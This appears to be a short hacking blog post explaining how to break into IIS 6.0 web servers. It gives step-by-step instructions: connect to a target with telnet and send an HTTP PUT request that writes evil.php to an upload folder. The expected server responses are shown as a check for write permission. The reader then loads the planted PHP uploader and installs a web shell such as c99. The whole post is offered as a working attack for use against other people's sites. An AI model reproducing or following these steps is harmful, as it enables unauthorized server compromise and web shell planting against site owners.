There are few steps to do this... i m going step by step to make u understand this method..
first step
========
download any shell as u like [c99.. etc.]
check the server for write permission... how to check ?? follow me..
goto cmd and type telnet www.server.com 80 when u get connected
type PUT /upload/evil.php HTTP/1.1
Host:iis/6.0
Content-Length:85
then press enter enter......
At this stage the server will respond with a 100 Continue message.
HTTP/1.1 100 Continue
Server:Microsoft-iis/6.0
Date:thu,4 nov 2010
when u recieve this.. type ur php uploader source code.. and press ENTER continuously...
after few seconds.. u will get msg. like this...
HTTP/1.1 201 Created
Server:Microsoft-iis/6.0
Date:thu,4 nov 2010
Location:http:/www.server.com/upload/evil.php
Content-Length:0
Allow:OPTION, TRACE, GET, HEAD, DELETE, ....ETC... ETC.
.If u got 201 respons.. means u got write permission enabled... hurray,,,..
open that site... www.server.com/upload/evil.php --> u got the uploader page then upload ur shell and ha ha ha ha.. u knw that wht to do now..
i hope u like this..
0 comments:
Post a Comment